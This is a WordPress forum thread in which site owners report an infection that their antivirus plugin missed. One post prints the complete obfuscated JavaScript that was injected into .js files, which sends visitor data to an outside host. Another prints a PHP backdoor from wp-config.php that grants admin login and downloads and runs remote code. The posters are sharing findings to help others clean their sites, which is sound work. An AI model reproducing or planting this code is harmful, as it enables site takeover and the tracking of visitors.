WordPress.org

Ready to get started?Download WordPress

Forums

AntiVirus
You should check .js files also (8 posts)

  1. tsst
    Member
    Posted 2 years ago #

    found the virus, which wasn't found by YR software.
    here is the code from the .js
    var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

    http://wordpress.org/extend/plugins/antivirus/

  2. tsst
    Member
    Posted 2 years ago #

    ALSO:
    check the file wp-config.php which can have the following code:

    [Code moderated as per the Forum Rules. Please use the pastebin]

    with that "pingnow" they are changing .js files.

  3. zmo
    Member
    Posted 2 years ago #

    Thank you!

  4. tsst
    Member
    Posted 2 years ago #

    Hope this will follow moderation rules:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == ‘f4b9ec30ad9f68f89b29639786cb62ef’){
    if ($_GET['pingnow']== ‘login’){
    $user_login = ‘admin’;
    $user = get_userdatabylogin($user_login);
    $user_id = $user->ID;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action(‘wp_login’, $user_login);
    }
    if (($_GET['pingnow']== ‘exec’)&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    $fnm = md5(rand(0,100)).’.php’;
    $fp = fopen($fnm, “w”);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    echo “location.href=’$fnm’;”;
    }
    if (($_GET['pingnow']== ‘eval’)&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $re = curl_exec($ch);
    curl_close($ch);
    eval($re);
    }}}
  5. GuruOnline
    Member
    Posted 2 years ago #

    Thanks very much for the info - Found the exact same situation on a client site of mine. A large numbers of .js files were tampered with. (No AV plugin installed)

    tsst - Do you have any idea on how this could have happened or any knowledge of the vulnerability that may have caused this? Being able to write to wp-config file is a "tad" insecure.

    I'll post up any other info I can find...Thanks for the post

  6. Bas
    Member
    Posted 2 years ago #

    Ive had the exact same code injected in my JS files, Ive been able to clean all my files. But Im really wondering how I can prevent this from happening in the future and how this could've happened. Is there anyone who could provide me more information about this?

  7. tsst
    Member
    Posted 2 years ago #

    Actually i have no idea, how it happened. I just investigated logs and found that someone uses that "GETS".
    Wordpress guys instead of stupid moderation should investigate, how to fix HUGE HOLES in their system.

  8. Mike
    Member
    Posted 2 years ago #

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags